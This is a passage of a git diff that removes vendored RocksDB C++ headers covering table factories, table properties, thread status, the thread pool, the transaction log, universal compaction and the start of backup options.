-  //     and cache the table object returned.
-  // (2) SstFileReader (for SST Dump) opens the table and dump the table
-  //     contents using the iterator of the table.
-  // (3) DBImpl::AddFile() calls this function to read the contents of
-  //     the sst file it's attempting to add
-  //
-  // table_reader_options is a TableReaderOptions which contain all the
-  //    needed parameters and configuration to open the table.
-  // file is a file handler to handle the file for the table.
-  // file_size is the physical file size of the file.
-  // table_reader is the output table reader.
-  virtual Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache = true) const = 0;
-
-  // Return a table builder to write to a file for this table type.
-  //
-  // It is called in several places:
-  // (1) When flushing memtable to a level-0 output file, it creates a table
-  //     builder (In DBImpl::WriteLevel0Table(), by calling BuildTable())
-  // (2) During compaction, it gets the builder for writing compaction output
-  //     files in DBImpl::OpenCompactionOutputFile().
-  // (3) When recovering from transaction logs, it creates a table builder to
-  //     write to a level-0 output file (In DBImpl::WriteLevel0TableForRecovery,
-  //     by calling BuildTable())
-  // (4) When running Repairer, it creates a table builder to convert logs to
-  //     SST files (In Repairer::ConvertLogToTable() by calling BuildTable())
-  //
-  // Multiple configured can be accessed from there, including and not limited
-  // to compression options. file is a handle of a writable file.
-  // It is the caller's responsibility to keep the file open and close the file
-  // after closing the table builder. compression_type is the compression type
-  // to use in this table.
-  virtual TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const = 0;
-
-  // Sanitizes the specified DB Options and ColumnFamilyOptions.
-  //
-  // If the function cannot find a way to sanitize the input DB Options,
-  // a non-ok Status will be returned.
-  virtual Status SanitizeOptions(
-      const DBOptions& db_opts,
-      const ColumnFamilyOptions& cf_opts) const = 0;
-
-  // Return a string that contains printable format of table configurations.
-  // RocksDB prints configurations at DB Open().
-  virtual std::string GetPrintableTableOptions() const = 0;
-
-  virtual Status GetOptionString(std::string* opt_string,
-                                 const std::string& delimiter) const {
-    return Status::NotSupported(
-        "The table factory doesn't implement GetOptionString().");
-  }
-
-  // Returns the raw pointer of the table options that is used by this
-  // TableFactory, or nullptr if this function is not supported.
-  // Since the return value is a raw pointer, the TableFactory owns the
-  // pointer and the caller should not delete the pointer.
-  //
-  // In certain case, it is desirable to alter the underlying options when the
-  // TableFactory is not used by any open DB by casting the returned pointer
-  // to the right class.   For instance, if BlockBasedTableFactory is used,
-  // then the pointer can be casted to BlockBasedTableOptions.
-  //
-  // Note that changing the underlying TableFactory options while the
-  // TableFactory is currently used by any open DB is undefined behavior.
-  // Developers should use DB::SetOption() instead to dynamically change
-  // options while the DB is open.
-  virtual void* GetOptions() { return nullptr; }
-
-  // Return is delete range supported
-  virtual bool IsDeleteRangeSupported() const { return false; }
-};
-
-#ifndef ROCKSDB_LITE
-// Create a special table factory that can open either of the supported
-// table formats, based on setting inside the SST files. It should be used to
-// convert a DB from one table format to another.
-// @table_factory_to_write: the table factory used when writing to new files.
-// @block_based_table_factory:  block based table factory to use. If NULL, use
-//                              a default one.
-// @plain_table_factory: plain table factory to use. If NULL, use a default one.
-// @cuckoo_table_factory: cuckoo table factory to use. If NULL, use a default one.
-extern TableFactory* NewAdaptiveTableFactory(
-    std::shared_ptr<TableFactory> table_factory_to_write = nullptr,
-    std::shared_ptr<TableFactory> block_based_table_factory = nullptr,
-    std::shared_ptr<TableFactory> plain_table_factory = nullptr,
-    std::shared_ptr<TableFactory> cuckoo_table_factory = nullptr);
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/table_properties.h b/thirdparty/rocksdb/include/rocksdb/table_properties.h
deleted file mode 100644
index 2605fad..0000000
--- a/thirdparty/rocksdb/include/rocksdb/table_properties.h
+++ /dev/null
@@ -1,221 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-#include <map>
-#include <string>
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-// -- Table Properties
-// Other than basic table properties, each table may also have the user
-// collected properties.
-// The value of the user-collected properties are encoded as raw bytes --
-// users have to interprete these values by themselves.
-// Note: To do prefix seek/scan in `UserCollectedProperties`, you can do
-// something similar to:
-//
-// UserCollectedProperties props = ...;
-// for (auto pos = props.lower_bound(prefix);
-//      pos != props.end() && pos->first.compare(0, prefix.size(), prefix) == 0;
-//      ++pos) {
-//   ...
-// }
-typedef std::map<std::string, std::string> UserCollectedProperties;
-
-// table properties' human-readable names in the property block.
-struct TablePropertiesNames {
-  static const std::string kDataSize;
-  static const std::string kIndexSize;
-  static const std::string kIndexPartitions;
-  static const std::string kTopLevelIndexSize;
-  static const std::string kFilterSize;
-  static const std::string kRawKeySize;
-  static const std::string kRawValueSize;
-  static const std::string kNumDataBlocks;
-  static const std::string kNumEntries;
-  static const std::string kFormatVersion;
-  static const std::string kFixedKeyLen;
-  static const std::string kFilterPolicy;
-  static const std::string kColumnFamilyName;
-  static const std::string kColumnFamilyId;
-  static const std::string kComparator;
-  static const std::string kMergeOperator;
-  static const std::string kPrefixExtractorName;
-  static const std::string kPropertyCollectors;
-  static const std::string kCompression;
-  static const std::string kCreationTime;
-  static const std::string kOldestKeyTime;
-};
-
-extern const std::string kPropertiesBlock;
-extern const std::string kCompressionDictBlock;
-extern const std::string kRangeDelBlock;
-
-enum EntryType {
-  kEntryPut,
-  kEntryDelete,
-  kEntrySingleDelete,
-  kEntryMerge,
-  kEntryOther,
-};
-
-// `TablePropertiesCollector` provides the mechanism for users to collect
-// their own properties that they are interested in. This class is essentially
-// a collection of callback functions that will be invoked during table
-// building. It is construced with TablePropertiesCollectorFactory. The methods
-// don't need to be thread-safe, as we will create exactly one
-// TablePropertiesCollector object per table and then call it sequentially
-class TablePropertiesCollector {
- public:
-  virtual ~TablePropertiesCollector() {}
-
-  // DEPRECATE User defined collector should implement AddUserKey(), though
-  //           this old function still works for backward compatible reason.
-  // Add() will be called when a new key/value pair is inserted into the table.
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  virtual Status Add(const Slice& /*key*/, const Slice& /*value*/) {
-    return Status::InvalidArgument(
-        "TablePropertiesCollector::Add() deprecated.");
-  }
-
-  // AddUserKey() will be called when a new key/value pair is inserted into the
-  // table.
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  virtual Status AddUserKey(const Slice& key, const Slice& value,
-                            EntryType /*type*/, SequenceNumber /*seq*/,
-                            uint64_t /*file_size*/) {
-    // For backwards-compatibility.
-    return Add(key, value);
-  }
-
-  // Finish() will be called when a table has already been built and is ready
-  // for writing the properties block.
-  // @params properties  User will add their collected statistics to
-  // `properties`.
-  virtual Status Finish(UserCollectedProperties* properties) = 0;
-
-  // Return the human-readable properties, where the key is property name and
-  // the value is the human-readable form of value.
-  virtual UserCollectedProperties GetReadableProperties() const = 0;
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const = 0;
-
-  // EXPERIMENTAL Return whether the output file should be further compacted
-  virtual bool NeedCompact() const { return false; }
-};
-
-// Constructs TablePropertiesCollector. Internals create a new
-// TablePropertiesCollector for each new table
-class TablePropertiesCollectorFactory {
- public:
-  struct Context {
-    uint32_t column_family_id;
-    static const uint32_t kUnknownColumnFamily;
-  };
-
-  virtual ~TablePropertiesCollectorFactory() {}
-  // has to be thread-safe
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) = 0;
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const = 0;
-};
-
-// TableProperties contains a bunch of read-only properties of its associated
-// table.
-struct TableProperties {
- public:
-  // the total size of all data blocks.
-  uint64_t data_size = 0;
-  // the size of index block.
-  uint64_t index_size = 0;
-  // Total number of index partitions if kTwoLevelIndexSearch is used
-  uint64_t index_partitions = 0;
-  // Size of the top-level index if kTwoLevelIndexSearch is used
-  uint64_t top_level_index_size = 0;
-  // the size of filter block.
-  uint64_t filter_size = 0;
-  // total raw key size
-  uint64_t raw_key_size = 0;
-  // total raw value size
-  uint64_t raw_value_size = 0;
-  // the number of blocks in this table
-  uint64_t num_data_blocks = 0;
-  // the number of entries in this table
-  uint64_t num_entries = 0;
-  // format version, reserved for backward compatibility
-  uint64_t format_version = 0;
-  // If 0, key is variable length. Otherwise number of bytes for each key.
-  uint64_t fixed_key_len = 0;
-  // ID of column family for this SST file, corresponding to the CF identified
-  // by column_family_name.
-  uint64_t column_family_id =
-      rocksdb::TablePropertiesCollectorFactory::Context::kUnknownColumnFamily;
-  // The time when the SST file was created.
-  // Since SST files are immutable, this is equivalent to last modified time.
-  uint64_t creation_time = 0;
-  // Timestamp of the earliest key. 0 means unknown.
-  uint64_t oldest_key_time = 0;
-
-  // Name of the column family with which this SST file is associated.
-  // If column family is unknown, `column_family_name` will be an empty string.
-  std::string column_family_name;
-
-  // The name of the filter policy used in this table.
-  // If no filter policy is used, `filter_policy_name` will be an empty string.
-  std::string filter_policy_name;
-
-  // The name of the comparator used in this table.
-  std::string comparator_name;
-
-  // The name of the merge operator used in this table.
-  // If no merge operator is used, `merge_operator_name` will be "nullptr".
-  std::string merge_operator_name;
-
-  // The name of the prefix extractor used in this table
-  // If no prefix extractor is used, `prefix_extractor_name` will be "nullptr".
-  std::string prefix_extractor_name;
-
-  // The names of the property collectors factories used in this table
-  // separated by commas
-  // {collector_name[1]},{collector_name[2]},{collector_name[3]} ..
-  std::string property_collectors_names;
-
-  // The compression algo used to compress the SST files.
-  std::string compression_name;
-
-  // user collected properties
-  UserCollectedProperties user_collected_properties;
-  UserCollectedProperties readable_properties;
-
-  // The offset of the value of each property in the file.
-  std::map<std::string, uint64_t> properties_offsets;
-
-  // convert this object to a human readable form
-  //   @prop_delim: delimiter for each property.
-  std::string ToString(const std::string& prop_delim = "; ",
-                       const std::string& kv_delim = "=") const;
-
-  // Aggregate the numerical member variables of the specified
-  // TableProperties.
-  void Add(const TableProperties& tp);
-};
-
-// Extra properties
-// Below is a list of non-basic properties that are collected by database
-// itself. Especially some properties regarding to the internal keys (which
-// is unknown to `table`).
-extern uint64_t GetDeletedKeys(const UserCollectedProperties& props);
-extern uint64_t GetMergeOperands(const UserCollectedProperties& props,
-                                 bool* property_present);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/thread_status.h b/thirdparty/rocksdb/include/rocksdb/thread_status.h
deleted file mode 100644
index 55c32ed..0000000
--- a/thirdparty/rocksdb/include/rocksdb/thread_status.h
+++ /dev/null
@@ -1,193 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file defines the structures for exposing run-time status of any
-// rocksdb-related thread.  Such run-time status can be obtained via
-// GetThreadList() API.
-//
-// Note that all thread-status features are still under-development, and
-// thus APIs and class definitions might subject to change at this point.
-// Will remove this comment once the APIs have been finalized.
-
-#pragma once
-
-#include <stdint.h>
-#include <cstddef>
-#include <map>
-#include <string>
-#include <utility>
-#include <vector>
-
-#if !defined(ROCKSDB_LITE) && \
-    !defined(NROCKSDB_THREAD_STATUS) && \
-    defined(ROCKSDB_SUPPORT_THREAD_LOCAL)
-#define ROCKSDB_USING_THREAD_STATUS
-#endif
-
-namespace rocksdb {
-
-// TODO(yhchiang): remove this function once c++14 is available
-//                 as std::max will be able to cover this.
-// Current MS compiler does not support constexpr
-template <int A, int B>
-struct constexpr_max {
-  static const int result = (A > B) ? A : B;
-};
-
-// A structure that describes the current status of a thread.
-// The status of active threads can be fetched using
-// rocksdb::GetThreadList().
-struct ThreadStatus {
-  // The type of a thread.
-  enum ThreadType : int {
-    HIGH_PRIORITY = 0,  // RocksDB BG thread in high-pri thread pool
-    LOW_PRIORITY,  // RocksDB BG thread in low-pri thread pool
-    USER,  // User thread (Non-RocksDB BG thread)
-    NUM_THREAD_TYPES
-  };
-
-  // The type used to refer to a thread operation.
-  // A thread operation describes high-level action of a thread.
-  // Examples include compaction and flush.
-  enum OperationType : int {
-    OP_UNKNOWN = 0,
-    OP_COMPACTION,
-    OP_FLUSH,
-    NUM_OP_TYPES
-  };
-
-  enum OperationStage : int {
-    STAGE_UNKNOWN = 0,
-    STAGE_FLUSH_RUN,
-    STAGE_FLUSH_WRITE_L0,
-    STAGE_COMPACTION_PREPARE,
-    STAGE_COMPACTION_RUN,
-    STAGE_COMPACTION_PROCESS_KV,
-    STAGE_COMPACTION_INSTALL,
-    STAGE_COMPACTION_SYNC_FILE,
-    STAGE_PICK_MEMTABLES_TO_FLUSH,
-    STAGE_MEMTABLE_ROLLBACK,
-    STAGE_MEMTABLE_INSTALL_FLUSH_RESULTS,
-    NUM_OP_STAGES
-  };
-
-  enum CompactionPropertyType : int {
-    COMPACTION_JOB_ID = 0,
-    COMPACTION_INPUT_OUTPUT_LEVEL,
-    COMPACTION_PROP_FLAGS,
-    COMPACTION_TOTAL_INPUT_BYTES,
-    COMPACTION_BYTES_READ,
-    COMPACTION_BYTES_WRITTEN,
-    NUM_COMPACTION_PROPERTIES
-  };
-
-  enum FlushPropertyType : int {
-    FLUSH_JOB_ID = 0,
-    FLUSH_BYTES_MEMTABLES,
-    FLUSH_BYTES_WRITTEN,
-    NUM_FLUSH_PROPERTIES
-  };
-
-  // The maximum number of properties of an operation.
-  // This number should be set to the biggest NUM_XXX_PROPERTIES.
-  static const int kNumOperationProperties =
-      constexpr_max<NUM_COMPACTION_PROPERTIES, NUM_FLUSH_PROPERTIES>::result;
-
-  // The type used to refer to a thread state.
-  // A state describes lower-level action of a thread
-  // such as reading / writing a file or waiting for a mutex.
-  enum StateType : int {
-    STATE_UNKNOWN = 0,
-    STATE_MUTEX_WAIT = 1,
-    NUM_STATE_TYPES
-  };
-
-  ThreadStatus(const uint64_t _id,
-               const ThreadType _thread_type,
-               const std::string& _db_name,
-               const std::string& _cf_name,
-               const OperationType _operation_type,
-               const uint64_t _op_elapsed_micros,
-               const OperationStage _operation_stage,
-               const uint64_t _op_props[],
-               const StateType _state_type) :
-      thread_id(_id), thread_type(_thread_type),
-      db_name(_db_name),
-      cf_name(_cf_name),
-      operation_type(_operation_type),
-      op_elapsed_micros(_op_elapsed_micros),
-      operation_stage(_operation_stage),
-      state_type(_state_type) {
-    for (int i = 0; i < kNumOperationProperties; ++i) {
-      op_properties[i] = _op_props[i];
-    }
-  }
-
-  // An unique ID for the thread.
-  const uint64_t thread_id;
-
-  // The type of the thread, it could be HIGH_PRIORITY,
-  // LOW_PRIORITY, and USER
-  const ThreadType thread_type;
-
-  // The name of the DB instance where the thread is currently
-  // involved with.  It would be set to empty string if the thread
-  // does not involve in any DB operation.
-  const std::string db_name;
-
-  // The name of the column family where the thread is currently
-  // It would be set to empty string if the thread does not involve
-  // in any column family.
-  const std::string cf_name;
-
-  // The operation (high-level action) that the current thread is involved.
-  const OperationType operation_type;
-
-  // The elapsed time of the current thread operation in microseconds.
-  const uint64_t op_elapsed_micros;
-
-  // An integer showing the current stage where the thread is involved
-  // in the current operation.
-  const OperationStage operation_stage;
-
-  // A list of properties that describe some details about the current
-  // operation.  Same field in op_properties[] might have different
-  // meanings for different operations.
-  uint64_t op_properties[kNumOperationProperties];
-
-  // The state (lower-level action) that the current thread is involved.
-  const StateType state_type;
-
-  // The followings are a set of utility functions for interpreting
-  // the information of ThreadStatus
-
-  static const std::string& GetThreadTypeName(ThreadType thread_type);
-
-  // Obtain the name of an operation given its type.
-  static const std::string& GetOperationName(OperationType op_type);
-
-  static const std::string MicrosToString(uint64_t op_elapsed_time);
-
-  // Obtain a human-readable string describing the specified operation stage.
-  static const std::string& GetOperationStageName(
-      OperationStage stage);
-
-  // Obtain the name of the "i"th operation property of the
-  // specified operation.
-  static const std::string& GetOperationPropertyName(
-      OperationType op_type, int i);
-
-  // Translate the "i"th property of the specified operation given
-  // a property value.
-  static std::map<std::string, uint64_t>
-      InterpretOperationProperties(
-          OperationType op_type, const uint64_t* op_properties);
-
-  // Obtain the name of a state given its type.
-  static const std::string& GetStateName(StateType state_type);
-};
-
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/threadpool.h b/thirdparty/rocksdb/include/rocksdb/threadpool.h
deleted file mode 100644
index e871ee1..0000000
--- a/thirdparty/rocksdb/include/rocksdb/threadpool.h
+++ /dev/null
@@ -1,57 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <functional>
-
-namespace rocksdb {
-
-/*
- * ThreadPool is a component that will spawn N background threads that will
- * be used to execute scheduled work, The number of background threads could
- * be modified by calling SetBackgroundThreads().
- * */
-class ThreadPool {
- public:
-  virtual ~ThreadPool() {}
-
-  // Wait for all threads to finish.
-  // Discard those threads that did not start
-  // executing
-  virtual void JoinAllThreads() = 0;
-
-  // Set the number of background threads that will be executing the
-  // scheduled jobs.
-  virtual void SetBackgroundThreads(int num) = 0;
-  virtual int GetBackgroundThreads() = 0;
-
-  // Get the number of jobs scheduled in the ThreadPool queue.
-  virtual unsigned int GetQueueLen() const = 0;
-
-  // Waits for all jobs to complete those
-  // that already started running and those that did not
-  // start yet. This ensures that everything that was thrown
-  // on the TP runs even though
-  // we may not have specified enough threads for the amount
-  // of jobs
-  virtual void WaitForJobsAndJoinAllThreads() = 0;
-
-  // Submit a fire and forget jobs
-  // This allows to submit the same job multiple times
-  virtual void SubmitJob(const std::function<void()>&) = 0;
-  // This moves the function in for efficiency
-  virtual void SubmitJob(std::function<void()>&&) = 0;
-
-};
-
-// NewThreadPool() is a function that could be used to create a ThreadPool
-// with `num_threads` background threads.
-extern ThreadPool* NewThreadPool(int num_threads);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/transaction_log.h b/thirdparty/rocksdb/include/rocksdb/transaction_log.h
deleted file mode 100644
index 7fc46ae..0000000
--- a/thirdparty/rocksdb/include/rocksdb/transaction_log.h
+++ /dev/null
@@ -1,125 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
-
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/write_batch.h"
-#include <memory>
-#include <vector>
-
-namespace rocksdb {
-
-class LogFile;
-typedef std::vector<std::unique_ptr<LogFile>> VectorLogPtr;
-
-enum  WalFileType {
-  /* Indicates that WAL file is in archive directory. WAL files are moved from
-   * the main db directory to archive directory once they are not live and stay
-   * there until cleaned up. Files are cleaned depending on archive size
-   * (Options::WAL_size_limit_MB) and time since last cleaning
-   * (Options::WAL_ttl_seconds).
-   */
-  kArchivedLogFile = 0,
-
-  /* Indicates that WAL file is live and resides in the main db directory */
-  kAliveLogFile = 1
-} ;
-
-class LogFile {
- public:
-  LogFile() {}
-  virtual ~LogFile() {}
-
-  // Returns log file's pathname relative to the main db dir
-  // Eg. For a live-log-file = /000003.log
-  //     For an archived-log-file = /archive/000003.log
-  virtual std::string PathName() const = 0;
-
-
-  // Primary identifier for log file.
-  // This is directly proportional to creation time of the log file
-  virtual uint64_t LogNumber() const = 0;
-
-  // Log file can be either alive or archived
-  virtual WalFileType Type() const = 0;
-
-  // Starting sequence number of writebatch written in this log file
-  virtual SequenceNumber StartSequence() const = 0;
-
-  // Size of log file on disk in Bytes
-  virtual uint64_t SizeFileBytes() const = 0;
-};
-
-struct BatchResult {
-  SequenceNumber sequence = 0;
-  std::unique_ptr<WriteBatch> writeBatchPtr;
-
-  // Add empty __ctor and __dtor for the rule of five
-  // However, preserve the original semantics and prohibit copying
-  // as the unique_ptr member does not copy.
-  BatchResult() {}
-
-  ~BatchResult() {}
-
-  BatchResult(const BatchResult&) = delete;
-
-  BatchResult& operator=(const BatchResult&) = delete;
-
-  BatchResult(BatchResult&& bResult)
-      : sequence(std::move(bResult.sequence)),
-        writeBatchPtr(std::move(bResult.writeBatchPtr)) {}
-
-  BatchResult& operator=(BatchResult&& bResult) {
-    sequence = std::move(bResult.sequence);
-    writeBatchPtr = std::move(bResult.writeBatchPtr);
-    return *this;
-  }
-};
-
-// A TransactionLogIterator is used to iterate over the transactions in a db.
-// One run of the iterator is continuous, i.e. the iterator will stop at the
-// beginning of any gap in sequences
-class TransactionLogIterator {
- public:
-  TransactionLogIterator() {}
-  virtual ~TransactionLogIterator() {}
-
-  // An iterator is either positioned at a WriteBatch or not valid.
-  // This method returns true if the iterator is valid.
-  // Can read data from a valid iterator.
-  virtual bool Valid() = 0;
-
-  // Moves the iterator to the next WriteBatch.
-  // REQUIRES: Valid() to be true.
-  virtual void Next() = 0;
-
-  // Returns ok if the iterator is valid.
-  // Returns the Error when something has gone wrong.
-  virtual Status status() = 0;
-
-  // If valid return's the current write_batch and the sequence number of the
-  // earliest transaction contained in the batch.
-  // ONLY use if Valid() is true and status() is OK.
-  virtual BatchResult GetBatch() = 0;
-
-  // The read options for TransactionLogIterator.
-  struct ReadOptions {
-    // If true, all data read from underlying storage will be
-    // verified against corresponding checksums.
-    // Default: true
-    bool verify_checksums_;
-
-    ReadOptions() : verify_checksums_(true) {}
-
-    explicit ReadOptions(bool verify_checksums)
-        : verify_checksums_(verify_checksums) {}
-  };
-};
-} //  namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/types.h b/thirdparty/rocksdb/include/rocksdb/types.h
deleted file mode 100644
index 106ac2f..0000000
--- a/thirdparty/rocksdb/include/rocksdb/types.h
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_TYPES_H_
-#define STORAGE_ROCKSDB_INCLUDE_TYPES_H_
-
-#include <stdint.h>
-
-namespace rocksdb {
-
-// Define all public custom types here.
-
-// Represents a sequence number in a WAL file.
-typedef uint64_t SequenceNumber;
-
-}  //  namespace rocksdb
-
-#endif //  STORAGE_ROCKSDB_INCLUDE_TYPES_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/universal_compaction.h b/thirdparty/rocksdb/include/rocksdb/universal_compaction.h
deleted file mode 100644
index ed22208..0000000
--- a/thirdparty/rocksdb/include/rocksdb/universal_compaction.h
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
-#define STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
-
-#include <stdint.h>
-#include <climits>
-#include <vector>
-
-namespace rocksdb {
-
-//
-// Algorithm used to make a compaction request stop picking new files
-// into a single compaction run
-//
-enum CompactionStopStyle {
-  kCompactionStopStyleSimilarSize, // pick files of similar size
-  kCompactionStopStyleTotalSize    // total size of picked files > next file
-};
-
-class CompactionOptionsUniversal {
- public:
-
-  // Percentage flexibility while comparing file size. If the candidate file(s)
-  // size is 1% smaller than the next file's size, then include next file into
-  // this candidate set. // Default: 1
-  unsigned int size_ratio;
-
-  // The minimum number of files in a single compaction run. Default: 2
-  unsigned int min_merge_width;
-
-  // The maximum number of files in a single compaction run. Default: UINT_MAX
-  unsigned int max_merge_width;
-
-  // The size amplification is defined as the amount (in percentage) of
-  // additional storage needed to store a single byte of data in the database.
-  // For example, a size amplification of 2% means that a database that
-  // contains 100 bytes of user-data may occupy upto 102 bytes of
-  // physical storage. By this definition, a fully compacted database has
-  // a size amplification of 0%. Rocksdb uses the following heuristic
-  // to calculate size amplification: it assumes that all files excluding
-  // the earliest file contribute to the size amplification.
-  // Default: 200, which means that a 100 byte database could require upto
-  // 300 bytes of storage.
-  unsigned int max_size_amplification_percent;
-
-  // If this option is set to be -1 (the default value), all the output files
-  // will follow compression type specified.
-  //
-  // If this option is not negative, we will try to make sure compressed
-  // size is just above this value. In normal cases, at least this percentage
-  // of data will be compressed.
-  // When we are compacting to a new file, here is the criteria whether
-  // it needs to be compressed: assuming here are the list of files sorted
-  // by generation time:
-  //    A1...An B1...Bm C1...Ct
-  // where A1 is the newest and Ct is the oldest, and we are going to compact
-  // B1...Bm, we calculate the total size of all the files as total_size, as
-  // well as  the total size of C1...Ct as total_C, the compaction output file
-  // will be compressed iff
-  //   total_C / total_size < this percentage
-  // Default: -1
-  int compression_size_percent;
-
-  // The algorithm used to stop picking files into a single compaction run
-  // Default: kCompactionStopStyleTotalSize
-  CompactionStopStyle stop_style;
-
-  // Option to optimize the universal multi level compaction by enabling
-  // trivial move for non overlapping files.
-  // Default: false
-  bool allow_trivial_move;
-
-  // Default set of parameters
-  CompactionOptionsUniversal()
-      : size_ratio(1),
-        min_merge_width(2),
-        max_merge_width(UINT_MAX),
-        max_size_amplification_percent(200),
-        compression_size_percent(-1),
-        stop_style(kCompactionStopStyleTotalSize),
-        allow_trivial_move(false) {}
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/backupable_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/backupable_db.h
deleted file mode 100644
index fc2b6ba..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/backupable_db.h
+++ /dev/null
@@ -1,328 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <string>
-#include <map>
-#include <vector>
-#include <functional>
-
-#include "rocksdb/utilities/stackable_db.h"
-
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-struct BackupableDBOptions {
-  // Where to keep the backup files. Has to be different than dbname_
-  // Best to set this to dbname_ + "/backups"
-  // Required
-  std::string backup_dir;
-
-  // Backup Env object. It will be used for backup file I/O. If it's
-  // nullptr, backups will be written out using DBs Env. If it's
-  // non-nullptr, backup's I/O will be performed using this object.
-  // If you want to have backups on HDFS, use HDFS Env here!
-  // Default: nullptr
-  Env* backup_env;
-
-  // If share_table_files == true, backup will assume that table files with
-  // same name have the same contents. This enables incremental backups and
-  // avoids unnecessary data copies.
-  // If share_table_files == false, each backup will be on its own and will
-  // not share any data with other backups.
-  // default: true
-  bool share_table_files;
-
-  // Backup info and error messages will be written to info_log
-  // if non-nullptr.
-  // Default: nullptr
-  Logger* info_log;
-
-  // If sync == true, we can guarantee you'll get consistent backup even
-  // on a machine crash/reboot. Backup process is slower with sync enabled.
-  // If sync == false, we don't guarantee anything on machine reboot. However,
-  // chances are some of the backups are consistent.
-  // Default: true
-  bool sync;
-
-  // If true, it will delete whatever backups there are already
-  // Default: false
-  bool destroy_old_data;
-
-  // If false, we won't backup log files. This option can be useful for backing
-  // up in-memory databases where log file are persisted, but table files are in
-  // memory.
-  // Default: true
-  bool backup_log_files;
-
-  // Max bytes that can be transferred in a second during backup.
-  // If 0, go as fast as you can
-  // Default: 0
-  uint64_t backup_rate_limit;
-
-  // Backup rate limiter. Used to control transfer speed for backup. If this is
-  // not null, backup_rate_limit is ignored.
-  // Default: nullptr
-  std::shared_ptr<RateLimiter> backup_rate_limiter{nullptr};
-
-  // Max bytes that can be transferred in a second during restore.
-  // If 0, go as fast as you can
-  // Default: 0
-  uint64_t restore_rate_limit;
-
-  // Restore rate limiter. Used to control transfer speed during restore. If
-  // this is not null, restore_rate_limit is ignored.
-  // Default: nullptr
-  std::shared_ptr<RateLimiter> restore_rate_limiter{nullptr};
-
-  // Only used if share_table_files is set to true. If true, will consider that
-  // backups can come from different databases, hence a sst is not uniquely
-  // identifed by its name, but by the triple (file name, crc32, file length)
-  // Default: false
-  // Note: this is an experimental option, and you'll need to set it manually
-  // *turn it on only if you know what you're doing*
-  bool share_files_with_checksum;
-
-  // Up to this many background threads will copy files for CreateNewBackup()
-  // and RestoreDBFromBackup()
-  // Default: 1
-  int max_background_operations;
-
-  // During backup user can get callback every time next
-  // callback_trigger_interval_size bytes being copied.
-  // Default: 4194304
-  uint64_t callback_trigger_interval_size;
-
